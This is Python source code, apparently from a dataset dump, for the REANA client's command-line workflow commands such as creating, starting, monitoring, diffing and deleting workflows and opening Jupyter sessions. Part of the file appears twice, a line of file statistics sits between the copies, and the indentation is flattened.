display_message("Workflow name cannot be a valid UUIDv4", msg_type="error")
try:
reana_specification = load_reana_spec(
click.format_filename(file), skip_validation
)
logging.info("Connecting to {0}".format(get_api_url()))
response = create_workflow(reana_specification, name, access_token)
click.echo(click.style(response["workflow_name"], fg="green"))
# check if command is called from wrapper command
if "invoked_by_subcommand" in ctx.parent.__dict__:
ctx.parent.workflow_name = response["workflow_name"]
except Exception as e:
logging.debug(traceback.format_exc())
logging.debug(str(e))
display_message(
"Cannot create workflow {}: \n{}".format(name, str(e)), msg_type="error"
)
if "invoked_by_subcommand" in ctx.parent.__dict__:
sys.exit(1)
@workflow_execution_group.command("start")
@add_workflow_option
@add_access_token_options
@check_connection
@click.option(
"-p",
"--parameter",
"parameters",
multiple=True,
callback=key_value_to_dict,
help="Additional input parameters to override "
"original ones from reana.yaml. "
"E.g. -p myparam1=myval1 -p myparam2=myval2.",
)
@click.option(
"-o",
"--option",
"options",
multiple=True,
callback=key_value_to_dict,
help="Additional operational options for the workflow execution. "
"E.g. CACHE=off. (workflow engine - serial) "
"E.g. --debug (workflow engine - cwl)",
)
@click.option(
"--follow",
"follow",
is_flag=True,
default=False,
help="If set, follows the execution of the workflow until termination.",
)
@click.pass_context
def workflow_start(
ctx, workflow, access_token, parameters, options, follow
): # noqa: D301
"""Start previously created workflow.
The `start` command allows to start previously created workflow. The
workflow execution can be further influenced by passing input prameters
using `-p` or `--parameters` flag and by setting additional operational
options using `-o` or `--options`. The input parameters and operational
options can be repetitive. For example, to disable caching for the Serial
workflow engine, you can set `-o CACHE=off`.
Examples: \n
\t $ reana-client start -w myanalysis.42 -p sleeptime=10 -p myparam=4 \n
\t $ reana-client start -w myanalysis.42 -p myparam1=myvalue1 -o CACHE=off
"""
from reana_client.utils import get_api_url
from reana_client.api.client import (
get_workflow_parameters,
get_workflow_status,
start_workflow,
)
logging.debug("command: {}".format(ctx.command_path.replace(" ", ".")))
for p in ctx.params:
logging.debug("{param}: {value}".format(param=p, value=ctx.params[p]))
parsed_parameters = {"input_parameters": parameters, "operational_options": options}
if workflow:
if parameters or options:
try:
response = get_workflow_parameters(workflow, access_token)
workflow_type = response["type"]
original_parameters = response["parameters"]
validate_operational_options(
workflow_type, parsed_parameters["operational_options"]
)
parsed_parameters["input_parameters"] = validate_input_parameters(
parsed_parameters["input_parameters"], original_parameters
)
except REANAValidationError as e:
click.secho(e.message, err=True, fg="red")
sys.exit(1)
except Exception as e:
click.secho(
"Could not apply given input parameters: "
"{0} \n{1}".format(parameters, str(e)),
err=True,
)
try:
logging.info("Connecting to {0}".format(get_api_url()))
response = start_workflow(workflow, access_token, parsed_parameters)
current_status = get_workflow_status(workflow, access_token).get("status")
click.secho(
get_workflow_status_change_msg(workflow, current_status), fg="green"
)
if follow:
while "running" in current_status:
time.sleep(TIMECHECK)
current_status = get_workflow_status(workflow, access_token).get(
"status"
)
click.secho(
get_workflow_status_change_msg(workflow, current_status),
fg="green",
)
if "finished" in current_status:
if follow:
click.secho(
"[INFO] Listing workflow output " "files...", bold=True
)
ctx.invoke(
get_files,
workflow=workflow,
access_token=access_token,
output_format="url",
)
sys.exit(0)
elif "failed" in current_status or "stopped" in current_status:
sys.exit(1)
except Exception as e:
logging.debug(traceback.format_exc())
logging.debug(str(e))
click.echo(
click.style(
"Cannot start workflow {}: \n{}".format(workflow, str(e)), fg="red"
),
err=True,
)
if "invoked_by_subcommand" in ctx.parent.__dict__:
sys.exit(1)
@workflow_execution_group.command("restart")
@add_workflow_option
@add_access_token_options
@check_connection
@click.option(
"-p",
"--parameter",
"parameters",
multiple=True,
callback=key_value_to_dict,
help="Additional input parameters to override "
"original ones from reana.yaml. "
"E.g. -p myparam1=myval1 -p myparam2=myval2.",
)
@click.option(
"-o",
"--option",
"options",
multiple=True,
callback=key_value_to_dict,
help="Additional operational options for the workflow execution. "
"E.g. CACHE=off. (workflow engine - serial) "
"E.g. --debug (workflow engine - cwl)",
)
@click.option(
"-f",
"--file",
type=click.Path(exists=True, resolve_path=True),
help="REANA specification file describing the workflow to "
"execute. [default=reana.yaml]",
)
@click.pass_context
def workflow_restart(
ctx, workflow, access_token, parameters, options, file
): # noqa: D301
"""Restart previously run workflow.
The `restart` command allows to restart a previous workflow on the same
workspace.
Note that workflow restarting can be used in a combination with operational
options ``FROM`` and ``TARGET``. You can also pass a modified workflow
specification with ``-f`` or `--file`` flag.
You can furthermore use modified input prameters using `-p` or
`--parameters` flag and by setting additional operational options using
`-o` or `--options`. The input parameters and operational options can be
repetitive.
Examples: \n
\t $ reana-client restart -w myanalysis.42 -p sleeptime=10 -p myparam=4 \n
\t $ reana-client restart -w myanalysis.42 -p myparam=myvalue\n
\t $ reana-client restart -w myanalysis.42 -o TARGET=gendata\n
\t $ reana-client restart -w myanalysis.42 -o FROM=fitdata
"""
from reana_client.utils import get_api_url
from reana_client.api.client import (
get_workflow_parameters,
get_workflow_status,
start_workflow,
)
logging.debug("command: {}".format(ctx.command_path.replace(" ", ".")))
for p in ctx.params:
logging.debug("{param}: {value}".format(param=p, value=ctx.params[p]))
parsed_parameters = {
"input_parameters": parameters,
"operational_options": options,
"restart": True,
}
if file:
parsed_parameters["reana_specification"] = load_reana_spec(
click.format_filename(file)
)
if workflow:
if parameters or options:
try:
if "reana_specification" in parsed_parameters:
workflow_type = parsed_parameters["reana_specification"][
"workflow"
]["type"]
original_parameters = (
parsed_parameters["reana_specification"]
.get("inputs", {})
.get("parameters", {})
)
else:
response = get_workflow_parameters(workflow, access_token)
workflow_type = response["type"]
original_parameters = response["parameters"]
parsed_parameters["operational_options"] = validate_operational_options(
workflow_type, parsed_parameters["operational_options"]
)
parsed_parameters["input_parameters"] = validate_input_parameters(
parsed_parameters["input_parameters"], original_parameters
)
except REANAValidationError as e:
click.secho(e.message, err=True, fg="red")
sys.exit(1)
except Exception as e:
click.secho(
"Could not apply given input parameters: "
"{0} \n{1}".format(parameters, str(e)),
err=True,
)
try:
logging.info("Connecting to {0}".format(get_api_url()))
response = start_workflow(workflow, access_token, parsed_parameters)
workflow = response["workflow_name"] + "." + str(response["run_number"])
current_status = get_workflow_status(workflow, access_token).get("status")
click.secho(
get_workflow_status_change_msg(workflow, current_status), fg="green"
)
except Exception as e:
logging.debug(traceback.format_exc())
logging.debug(str(e))
click.echo(
click.style(
"Cannot start workflow {}: \n{}".format(workflow, str(e)), fg="red"
),
err=True,
)
if "invoked_by_subcommand" in ctx.parent.__dict__:
sys.exit(1)
@workflow_execution_group.command("status")
@add_workflow_option
@click.option(
"--format",
"_format",
multiple=True,
help="Format output by displaying only certain columns. "
"E.g. --format name,status.",
)
@click.option(
"--json",
"output_format",
flag_value="json",
default=None,
help="Get output in JSON format.",
)
@add_access_token_options
@check_connection
@click.option("-v", "--verbose", count=True, help="Set status information verbosity.")
@click.pass_context
def workflow_status( # noqa: C901
ctx, workflow, _format, output_format, access_token, verbose
): # noqa: D301
"""Get status of a workflow.
The `status` command allow to retrieve status of a workflow. The status can
be created, queued, running, failed, etc. You can increase verbosity or
filter retrieved information by passing appropriate command-line options.
Examples: \n
\t $ reana-client status -w myanalysis.42 \n
\t $ reana-client status -w myanalysis.42 -v --json
"""
import tablib
from reana_client.api.client import get_workflow_status
logging.debug("command: {}".format(ctx.command_path.replace(" ", ".")))
for p in ctx.params:
logging.debug("{param}: {value}".format(param=p, value=ctx.params[p]))
if workflow:
try:
if _format:
parsed_filters = parse_format_parameters(_format)
_format = [item["column_name"] for item in parsed_filters]
response = get_workflow_status(workflow, access_token)
headers = ["name", "run_number", "created", "status"]
verbose_headers = ["id", "user", "command"]
data = []
if not isinstance(response, list):
response = [response]
for workflow in response:
add_data_from_reponse(workflow, data, headers)
if verbose:
headers += verbose_headers
add_verbose_data_from_response(
workflow, verbose_headers, headers, data
)
if output_format:
tablib_data = tablib.Dataset()
tablib_data.headers = headers
for row in data:
tablib_data.append(row)
if _format:
tablib_data = tablib_data.subset(rows=None, cols=list(_format))
click.echo(tablib_data.export(output_format))
else:
click_table_printer(headers, _format, data)
except Exception as e:
logging.debug(traceback.format_exc())
logging.debug(str(e))
click.echo(
click.style(
"Cannot retrieve the status of a workflow {}: \n{}".format(
workflow, str(e)
),
fg="red",
),
err=True,
)
@workflow_execution_group.command("logs")
@add_workflow_option
@click.option("--json", "json_format", count=True, help="Get output in JSON format.")
@add_access_token_options
@click.option(
"--filter",
"filters",
multiple=True,
help="Filter job logs to include only those steps that match certain filtering criteria. Use --filter name=value pairs. Available filters are compute_backend, docker_img, status and step.",
)
@add_pagination_options
@check_connection
@click.pass_context
def workflow_logs(
ctx,
workflow,
access_token,
json_format,
steps=None,
filters=None,
page=None,
size=None,
): # noqa: D301
"""Get workflow logs.
The `logs` command allows to retrieve logs of running workflow. Note that
only finished steps of the workflow are returned, the logs of the currently
processed step is not returned until it is finished.
Examples: \n
\t $ reana-client logs -w myanalysis.42
\t $ reana-client logs -w myanalysis.42 -s 1st_step
"""
from reana_client.api.client import get_workflow_logs
available_filters = {
"step": "job_name",
"compute_backend": "compute_backend",
"docker_img": "docker_img",
"status": "status",
}
steps = []
chosen_filters = dict()
logging.debug("command: {}".format(ctx.command_path.replace(" ", ".")))
for p in ctx.params:
logging.debug("{param}: {value}".format(param=p, value=ctx.params[p]))
if workflow:
if filters:
try:
for f in filters:
key, value = f.split("=")
if key not in available_filters:
click.echo(
click.style(
"Error: filter '{}' is not valid.\nAvailable filters are '{}'.".format(
key, "' '".join(sorted(available_filters.keys())),
),
fg="red",
),
err=True,
)
sys.exit(1)
elif key == "step":
steps.append(value)
else:
# Case insensitive for compute backends
if (
key == "compute_backend"
and value.lower() in REANA_COMPUTE_BACKENDS
):
value = REANA_COMPUTE_BACKENDS[value.lower()]
elif key == "status" and value not in RUN_STATUSES:
click.secho(
"==> ERROR: Input status value {} is not valid. ".format(
value
),
err=True,
fg="red",
),
sys.exit(1)
chosen_filters[key] = value
except Exception as e:
logging.debug(traceback.format_exc())
logging.debug(str(e))
click.echo(
click.style(
"Error: please provide complete --filter name=value pairs, for example --filter status=running.\nAvailable filters are '{}'.".format(
"' '".join(sorted(available_filters.keys()))
),
fg="red",
),
err=True,
)
sys.exit(1)
try:
response = get_workflow_logs(
workflow,
access_token,
steps=None if not steps else list(set(steps)),
page=page,
size=size,
)
workflow_logs = json.loads(response["logs"])
if filters:
for key, value in chosen_filters.items():
unwanted_steps = [
k
for k, v in workflow_logs["job_logs"].items()
if v[available_filters[key]] != value
]
for job_id in unwanted_steps:
del workflow_logs["job_logs"][job_id]
if json_format:
click.echo(json.dumps(workflow_logs, indent=2))
sys.exit(0)
else:
from reana_client.cli.utils import output_user_friendly_logs
output_user_friendly_logs(
workflow_logs, None if not steps else list(set(steps))
)
except Exception as e:
logging.debug(traceback.format_exc())
logging.debug(str(e))
click.echo(
click.style(
"Cannot retrieve the logs of a workflow {}: \n{}".format(
workflow, str(e)
),
fg="red",
),
err=True,
)
@workflow_execution_group.command("validate")
@click.option(
"-f",
"--file",
type=click.Path(exists=True, resolve_path=True),
default=get_reana_yaml_file_path,
help="REANA specification file describing the workflow to "
"execute. [default=reana.yaml]",
)
@click.option(
"--environments",
is_flag=True,
default=False,
help="If set, check all runtime environments specified in REANA "
"specification file. [default=False]",
)
@click.option(
"--pull",
is_flag=True,
default=False,
callback=requires_environments,
help="If set, try to pull remote environment image from registry to perform "
"validation locally. Requires ``--environments`` flag. [default=False]",
)
@click.pass_context
def workflow_validate(ctx, file, environments, pull): # noqa: D301
"""Validate workflow specification file.
The `validate` command allows to check syntax and validate the reana.yaml
workflow specification file.
Examples: \n
\t $ reana-client validate -f reana.yaml
"""
logging.debug("command: {}".format(ctx.command_path.replace(" ", ".")))
for p in ctx.params:
logging.debug("{param}: {value}".format(param=p, value=ctx.params[p]))
try:
load_reana_spec(
click.format_filename(file),
skip_validate_environments=not environments,
pull_environment_image=pull,
)
except (ValidationError, REANAValidationError) as e:
logging.debug(traceback.format_exc())
logging.debug(str(e))
display_message(
"{0} is not a valid REANA specification:\n{1}".format(
click.format_filename(file), e.message
),
msg_type="error",
)
except Exception as e:
logging.debug(traceback.format_exc())
logging.debug(str(e))
display_message(
"Something went wrong when trying to validate {}".format(file),
msg_type="error",
)
@workflow_execution_group.command("stop")
@click.option(
"--force",
"force_stop",
is_flag=True,
default=False,
help="Stop a workflow without waiting for jobs to finish.",
)
@add_workflow_option
@add_access_token_options
@check_connection
@click.pass_context
def workflow_stop(ctx, workflow, force_stop, access_token): # noqa: D301
"""Stop a running workflow.
The `stop` command allows to hard-stop the running workflow process. Note
that soft-stopping of the workflow is currently not supported. This command
should be therefore used with care, only if you are absolutely sure that
there is no point in continuing the running the workflow.
Example: \n
\t $ reana-client stop -w myanalysis.42 --force
"""
from reana_client.api.client import get_workflow_status, stop_workflow
if not force_stop:
click.secho(
"Graceful stop not implement yet. If you really want to "
"stop your workflow without waiting for jobs to finish"
" use: --force option",
fg="red",
)
raise click.Abort()
if workflow:
try:
logging.info("Sending a request to stop workflow {}".format(workflow))
stop_workflow(workflow, force_stop, access_token)
click.secho(get_workflow_status_change_msg(workflow, "stopped"), fg="green")
except Exception as e:
logging.debug(traceback.format_exc())
logging.debug(str(e))
click.secho(
"Cannot stop workflow {}: \n{}".format(workflow, str(e)),
fg="red",
err=True,
)
@workflow_execution_group.command("run")
@click.option(
"-f",
"--file",
type=click.Path(exists=True, resolve_path=True),
default=get_reana_yaml_file_path,
help="REANA specification file describing the workflow to "
"execute. [default=reana.yaml]",
)
@click.option(
"-n",
"--name",
"-w",
"--workflow",
default="",
callback=validate_workflow_name,
help='Optional name of the workflow. [default is "workflow"]',
)
@click.option(
"--skip-validation",
is_flag=True,
help="If set, specifications file is not validated before "
"submitting it's contents to REANA server.",
)
@click.option(
"-p",
"--parameter",
"parameters",
multiple=True,
callback=key_value_to_dict,
help="Additional input parameters to override "
"original ones from reana.yaml. "
"E.g. -p myparam1=myval1 -p myparam2=myval2.",
)
@click.option(
"-o",
"--option",
"options",
multiple=True,
callback=key_value_to_dict,
help="Additional operational options for the workflow execution. "
"E.g. CACHE=off.",
)
@click.option(
"--follow",
"follow",
is_flag=True,
default=False,
help="If set, follows the execution of the workflow until termination.",
)
@add_access_token_options
@check_connection
@click.pass_context
def workflow_run(
ctx, file, name, skip_validation, access_token, parameters, options, follow
): # noqa: D301
"""Shortcut to create, upload, start a new workflow.
The `run` command allows to create a new workflow, upload its input files
and start it in one command.
Examples: \n
\t $ reana-client run -w myanalysis-test-small -p myparam=mysmallvalue \n
\t $ reana-client run -w myanalysis-test-big -p myparam=mybigvalue
"""
# set context parameters for subcommand
ctx.invoked_by_subcommand = True
ctx.workflow_name = ""
click.secho("[INFO] Creating a workflow...", bold=True)
ctx.invoke(
workflow_create,
file=file,
name=name,
skip_validation=skip_validation,
access_token=access_token,
)
click.secho("[INFO] Uploading files...", bold=True)
ctx.invoke(
upload_files,
workflow=ctx.workflow_name,
filenames=None,
access_token=access_token,
)
click.secho("[INFO] Starting workflow...", bold=True)
ctx.invoke(
workflow_start,
workflow=ctx.workflow_name,
access_token=access_token,
parameters=parameters,
options=options,
follow=follow,
)
@workflow_management_group.command("delete")
@click.option(
"--include-all-runs",
"all_runs",
is_flag=True,
help="Delete all runs of a given workflow.",
)
@click.option(
"--include-workspace",
"workspace",
is_flag=True,
help="Delete workspace from REANA.",
)
@add_workflow_option
@add_access_token_options
@check_connection
@click.pass_context
def workflow_delete(ctx, workflow, all_runs, workspace, access_token): # noqa: D301
"""Delete a workflow.
The `delete` command allows to remove workflow runs from the database and
the workspace. By default, the command removes the workflow and all its
cached information and hides the workflow from the workflow list. Note that
workflow workspace will still be accessible until you use
`--include-workspace` flag. Note also that you can remove all past runs of
a workflow by specifying `--include-all-runs` flag.
Example: \n
\t $ reana-client delete -w myanalysis.42 \n
\t $ reana-client delete -w myanalysis.42 --include-all-runs \n
\t $ reana-client delete -w myanalysis.42 --include-workspace
"""
from reana_client.api.client import delete_workflow, get_workflow_status
from reana_client.utils import get_api_url
logging.debug("command: {}".format(ctx.command_path.replace(" ", ".")))
for p in ctx.params:
logging.debug("{param}: {value}".format(param=p, value=ctx.params[p]))
if workflow:
try:
logging.info("Connecting to {0}".format(get_api_url()))
delete_workflow(workflow, all_runs, workspace, access_token)
if all_runs:
message = "All workflows named '{}' have been deleted.".format(
workflow.split(".")[0]
)
else:
message = get_workflow_status_change_msg(workflow, "deleted")
click.secho(message, fg="green")
except Exception as e:
logging.debug(traceback.format_exc())
logging.debug(str(e))
click.echo(
click.style(
"Cannot delete workflow {} \n{}".format(workflow, str(e)), fg="red"
),
err=True,
)
@workflow_management_group.command("diff")
@click.argument(
"workflow_a",
default=os.environ.get("REANA_WORKON", None),
callback=workflow_uuid_or_name,
)
@click.argument("workflow_b", callback=workflow_uuid_or_name)
@click.option(
"-q",
"--brief",
is_flag=True,
help="If not set, differences in the contents of the files in the two "
"workspaces are shown.",
)
@click.option(
"-u",
"-U",
"--unified",
"context_lines",
type=int,
default=5,
help="Sets number of context lines for workspace diff output.",
)
@add_access_token_options
@check_connection
@click.pass_context
def workflow_diff(
ctx, workflow_a, workflow_b, brief, access_token, context_lines
): # noqa: D301
"""Show diff between two workflows.
The `diff` command allows to compare two workflows, the workflow_a and
workflow_b, which must be provided as arguments. The output will show the
difference in workflow run parameters, the generated files, the logs, etc.
Examples: \n
\t $ reana-client diff myanalysis.42 myotheranalysis.43 \n
\t $ reana-client diff myanalysis.42 myotheranalysis.43 --brief
"""
from reana_client.api.client import diff_workflows
logging.debug("command: {}".format(ctx.command_path.replace(" ", ".")))
for p in ctx.params:
logging.debug("{param}: {value}".format(param=p, value=ctx.params[p]))
leading_mark = "==>"
try:
response = diff_workflows(
workflow_a, workflow_b, brief, access_token, str(context_lines)
)
if response.get("reana_specification"):
specification_diff = json.loads(response["reana_specification"])
nonempty_sections = {k: v for k, v in specification_diff.items() if v}
if not nonempty_sections:
click.secho(
"{} No differences in REANA specifications.".format(leading_mark),
bold=True,
fg="yellow",
)
# Rename section workflow -> specification
if "workflow" in nonempty_sections:
nonempty_sections["specification"] = nonempty_sections.pop("workflow")
for section, content in nonempty_sections.items():
click.secho(
"{} Differences in workflow {}".format(leading_mark, section),
bold=True,
fg="yellow",
)
print_color_diff(content)
click.echo("") # Leave 1 line for separation
workspace_diff = json.loads(response.get("workspace_listing"))
if workspace_diff:
workspace_diff = workspace_diff.splitlines()
click.secho(
"{} Differences in workflow workspace".format(leading_mark),
bold=True,
fg="yellow",
)
print_color_diff(workspace_diff)
except Exception as e:
logging.debug(traceback.format_exc())
logging.debug(str(e))
click.echo(
click.style(
"Something went wrong when trying to get diff:\n{}".format(str(e)),
fg="red",
),
err=True,
)
@click.group(help="Workspace interactive commands")
def interactive_group():
"""Workspace interactive commands."""
pass
@interactive_group.command("open")
@add_workflow_option
@click.argument(
"interactive-session-type",
metavar="interactive-session-type",
default=INTERACTIVE_SESSION_TYPES[0],
type=click.Choice(INTERACTIVE_SESSION_TYPES),
)
@click.option(
"-i",
"--image",
help="Docker image which will be used to spawn the interactive session. "
"Overrides the default image for the selected type.",
)
@add_access_token_options
@check_connection
@click.pass_context
def workflow_open_interactive_session(
ctx, workflow, interactive_session_type, image, access_token
): # noqa: D301
"""Open an interactive session inside the workspace.
The `open` command allows to open interactive session processes on top of
the workflow workspace, such as Jupyter notebooks. This is useful to
quickly inspect and analyse the produced files while the workflow is stlil
running.
Examples:\n
\t $ reana-client open -w myanalysis.42 jupyter
"""
from reana_client.api.client import open_interactive_session
if workflow:
try:
logging.info("Opening an interactive session on {}".format(workflow))
interactive_session_configuration = {
"image": image or None,
}
path = open_interactive_session(
workflow,
access_token,
interactive_session_type,
interactive_session_configuration,
)
click.secho(
format_session_uri(
reana_server_url=ctx.obj.reana_server_url,
path=path,
access_token=access_token,
),
fg="green",
)
click.echo(
"It could take several minutes to start the " "interactive session."
)
except Exception as e:
logging.debug(traceback.format_exc())
logging.debug(str(e))
click.secho(
"Interactive session could not be opened: \n{}".format(str(e)),
fg="red",
err=True,
)
else:
click.secho("Cannot find workflow {}".format(workflow), fg="red", err=True)
@interactive_group.command("close")
@add_workflow_option
@add_access_token_options
@check_connection
def workflow_close_interactive_session(workflow, access_token): # noqa: D301
"""Close an interactive session.
The `close` command allows to shut down any interactive sessions that you
may have running. You would typically use this command after you finished
exploring data in the Jupyter notebook and after you have transferred any
code created in your interactive session.
Examples:\n
\t $ reana-client close -w myanalysis.42
"""
from reana_client.api.client import close_interactive_session
if workflow:
try:
logging.info("Closing an interactive session on {}".format(workflow))
close_interactive_session(workflow, access_token)
click.echo(
"Interactive session for workflow {}"
" was successfully closed".format(workflow)
)
except Exception as e:
logging.debug(traceback.format_exc())
logging.debug(str(e))
click.secho(
"Interactive session could not be closed: \n{}".format(str(e)),
fg="red",
err=True,
)
else:
click.secho("Cannot find workflow {} ".format(workflow), fg="red", err=True)
| 34.772429 | 193 | 0.592683 | # -*- coding: utf-8 -*-
#
# This file is part of REANA.
# Copyright (C) 2017, 2018 CERN.
#
# REANA is free software; you can redistribute it and/or modify it
# under the terms of the MIT License; see LICENSE file for more details.
"""REANA client workflow related commands."""
import json
import logging
import os
import sys
import time
import traceback
import click
from jsonschema.exceptions import ValidationError
from reana_commons.config import INTERACTIVE_SESSION_TYPES, REANA_COMPUTE_BACKENDS
from reana_commons.errors import REANAValidationError
from reana_commons.operational_options import validate_operational_options
from reana_commons.utils import click_table_printer
from reana_client.cli.files import get_files, upload_files
from reana_client.cli.utils import (
add_access_token_options,
add_pagination_options,
add_workflow_option,
check_connection,
format_data,
format_session_uri,
human_readable_or_raw_option,
key_value_to_dict,
parse_filter_parameters,
parse_format_parameters,
requires_environments,
validate_workflow_name,
get_formatted_progress,
)
from reana_client.config import ERROR_MESSAGES, RUN_STATUSES, TIMECHECK
from reana_client.printer import display_message
from reana_client.utils import (
get_reana_yaml_file_path,
get_workflow_name_and_run_number,
get_workflow_status_change_msg,
is_uuid_v4,
load_reana_spec,
validate_input_parameters,
workflow_uuid_or_name,
)
@click.group(help="Workflow management commands")
@click.pass_context
def workflow_management_group(ctx):
"""Top level wrapper for workflow management."""
logging.debug(ctx.info_name)
@click.group(help="Workflow execution commands")
@click.pass_context
def workflow_execution_group(ctx):
"""Top level wrapper for execution related interaction."""
logging.debug(ctx.info_name)
@workflow_management_group.command("list")
@click.option(
"-s", "--sessions", is_flag=True, help="List all open interactive sessions."
)
@click.option(
"--format",
"_format",
multiple=True,
help="Format output according to column titles or column values. "
"Use `<columm_name>=<column_value>` format. "
"E.g. display workflow with failed status and named test_workflow "
"`--format status=failed,name=test_workflow`.",
)
@click.option(
"--json",
"output_format",
flag_value="json",
default=None,
help="Get output in JSON format.",
)
@click.option(
"--all",
"show_all",
count=True,
default=True,
help="Show all workflows including deleted ones.",
)
@click.option(
"-v",
"--verbose",
count=True,
help="Print out extra information: workflow id, user id, disk usage.",
)
@human_readable_or_raw_option
@click.option(
"--sort",
"sort_columm_name",
default="CREATED",
help="Sort the output by specified column",
)
@click.option(
"--filter",
"filters",
multiple=True,
help="Filter workflow that contains certain filtering criteria. "
"Use `--filter <columm_name>=<column_value>` pairs. "
"Available filters are `name` and `status`.",
)
@click.option(
"--include-progress",
"include_progress",
is_flag=True,
default=None,
help="Include progress information of the workflows.",
)
@click.option(
"--include-workspace-size",
"include_workspace_size",
is_flag=True,
default=None,
help="Include size information of the workspace.",
)
@add_access_token_options
@add_pagination_options
@check_connection
@click.pass_context
def workflow_workflows( # noqa: C901
ctx,
sessions,
_format,
output_format,
access_token,
show_all,
verbose,
human_readable_or_raw,
sort_columm_name,
page,
size,
filters,
include_progress,
include_workspace_size,
): # noqa: D301
"""List all workflows and sessions.
The `list` command lists workflows and sessions. By default, the list of
workflows is returned. If you would like to see the list of your open
interactive sessions, you need to pass the `--sessions` command-line
option.
Example: \n
\t $ reana-client list --all \n
\t $ reana-client list --sessions \n
\t $ reana-client list --verbose --bytes
"""
import tablib
from reana_client.api.client import get_workflows
logging.debug("command: {}".format(ctx.command_path.replace(" ", ".")))
for p in ctx.params:
logging.debug("{param}: {value}".format(param=p, value=ctx.params[p]))
type = "interactive" if sessions else "batch"
status_filter = None
search_filter = None
if filters:
filter_names = ["name", "status"]
status_filter, search_filter = parse_filter_parameters(filters, filter_names)
if _format:
parsed_format_filters = parse_format_parameters(_format)
try:
response = get_workflows(
access_token,
type,
verbose=bool(verbose),
page=page,
size=size,
status=status_filter,
search=search_filter,
include_progress=include_progress,
include_workspace_size=include_workspace_size,
)
verbose_headers = ["id", "user"]
workspace_size_header = ["size"]
progress_header = ["progress"]
headers = {
"batch": ["name", "run_number", "created", "started", "ended", "status"],
"interactive": [
"name",
"run_number",
"created",
"session_type",
"session_uri",
"session_status",
],
}
if verbose:
headers[type] += verbose_headers
if verbose or include_workspace_size:
headers[type] += workspace_size_header
if verbose or include_progress:
headers[type] += progress_header
data = []
for workflow in response:
workflow["size"] = workflow["size"][human_readable_or_raw]
if workflow["status"] == "deleted" and not show_all:
continue
name, run_number = get_workflow_name_and_run_number(workflow["name"])
workflow["name"] = name
workflow["run_number"] = run_number
if type == "interactive":
workflow["session_uri"] = format_session_uri(
reana_server_url=ctx.obj.reana_server_url,
path=workflow["session_uri"],
access_token=access_token,
)
row = []
for header in headers[type]:
value = None
if header in progress_header:
value = get_formatted_progress(workflow.get("progress"))
elif header in ["started", "ended"]:
_key = (
"run_started_at" if header == "started" else "run_finished_at"
)
value = workflow.get("progress", {}).get(_key) or "-"
if not value:
value = workflow.get(header)
row.append(value)
data.append(row)
sort_column_id = 2
if sort_columm_name.lower() in headers[type]:
sort_column_id = headers[type].index(sort_columm_name.lower())
data = sorted(data, key=lambda x: x[sort_column_id], reverse=True)
workflow_ids = ["{0}.{1}".format(w[0], w[1]) for w in data]
if os.getenv("REANA_WORKON", "") in workflow_ids:
active_workflow_idx = workflow_ids.index(os.getenv("REANA_WORKON", ""))
for idx, row in enumerate(data):
if idx == active_workflow_idx:
run_number = str(data[idx][headers[type].index("run_number")])
run_number += " *"
tablib_data = tablib.Dataset()
tablib_data.headers = headers[type]
for row in data:
tablib_data.append(row=row, tags=row)
if _format:
tablib_data, filtered_headers = format_data(
parsed_format_filters, headers[type], tablib_data
)
if output_format:
click.echo(json.dumps(tablib_data))
else:
tablib_data = [list(item.values()) for item in tablib_data]
click_table_printer(filtered_headers, filtered_headers, tablib_data)
else:
if output_format:
click.echo(tablib_data.export(output_format))
else:
click_table_printer(headers[type], _format, data)
except Exception as e:
logging.debug(traceback.format_exc())
logging.debug(str(e))
click.echo(
click.style(
"Workflow list could not be retrieved: \n{}".format(str(e)), fg="red"
),
err=True,
)
@workflow_management_group.command("create")
@click.option(
"-f",
"--file",
type=click.Path(exists=True, resolve_path=True),
default=get_reana_yaml_file_path,
help="REANA specification file describing the workflow to "
"execute. [default=reana.yaml]",
)
@click.option(
"-n",
"--name",
"-w",
"--workflow",
default="",
callback=validate_workflow_name,
help='Optional name of the workflow. [default is "workflow"]',
)
@click.option(
"--skip-validation",
is_flag=True,
help="If set, specifications file is not validated before "
"submitting it's contents to REANA server.",
)
@add_access_token_options
@check_connection
@click.pass_context
def workflow_create(ctx, file, name, skip_validation, access_token): # noqa: D301
"""Create a new workflow.
The `create` command allows to create a new workflow from reana.yaml
specifications file. The file is expected to be located in the current
working directory, or supplied via command-line -f option, see examples
below.
Examples: \n
\t $ reana-client create\n
\t $ reana-client create -w myanalysis\n
\t $ reana-client create -w myanalysis -f myreana.yaml\n
"""
from reana_client.api.client import create_workflow
from reana_client.utils import get_api_url
logging.debug("command: {}".format(ctx.command_path.replace(" ", ".")))
for p in ctx.params:
logging.debug("{param}: {value}".format(param=p, value=ctx.params[p]))
# Check that name is not an UUIDv4.
# Otherwise it would mess up `--workflow` flag usage because no distinction
# could be made between the name and actual UUID of workflow.
if is_uuid_v4(name):
display_message("Workflow name cannot be a valid UUIDv4", msg_type="error")
try:
reana_specification = load_reana_spec(
click.format_filename(file), skip_validation
)
logging.info("Connecting to {0}".format(get_api_url()))
response = create_workflow(reana_specification, name, access_token)
click.echo(click.style(response["workflow_name"], fg="green"))
# check if command is called from wrapper command
if "invoked_by_subcommand" in ctx.parent.__dict__:
ctx.parent.workflow_name = response["workflow_name"]
except Exception as e:
logging.debug(traceback.format_exc())
logging.debug(str(e))
display_message(
"Cannot create workflow {}: \n{}".format(name, str(e)), msg_type="error"
)
if "invoked_by_subcommand" in ctx.parent.__dict__:
sys.exit(1)
@workflow_execution_group.command("start")
@add_workflow_option
@add_access_token_options
@check_connection
@click.option(
"-p",
"--parameter",
"parameters",
multiple=True,
callback=key_value_to_dict,
help="Additional input parameters to override "
"original ones from reana.yaml. "
"E.g. -p myparam1=myval1 -p myparam2=myval2.",
)
@click.option(
"-o",
"--option",
"options",
multiple=True,
callback=key_value_to_dict,
help="Additional operational options for the workflow execution. "
"E.g. CACHE=off. (workflow engine - serial) "
"E.g. --debug (workflow engine - cwl)",
)
@click.option(
"--follow",
"follow",
is_flag=True,
default=False,
help="If set, follows the execution of the workflow until termination.",
)
@click.pass_context
def workflow_start(
ctx, workflow, access_token, parameters, options, follow
): # noqa: D301
"""Start previously created workflow.
The `start` command allows to start previously created workflow. The
workflow execution can be further influenced by passing input prameters
using `-p` or `--parameters` flag and by setting additional operational
options using `-o` or `--options`. The input parameters and operational
options can be repetitive. For example, to disable caching for the Serial
workflow engine, you can set `-o CACHE=off`.
Examples: \n
\t $ reana-client start -w myanalysis.42 -p sleeptime=10 -p myparam=4 \n
\t $ reana-client start -w myanalysis.42 -p myparam1=myvalue1 -o CACHE=off
"""
from reana_client.utils import get_api_url
from reana_client.api.client import (
get_workflow_parameters,
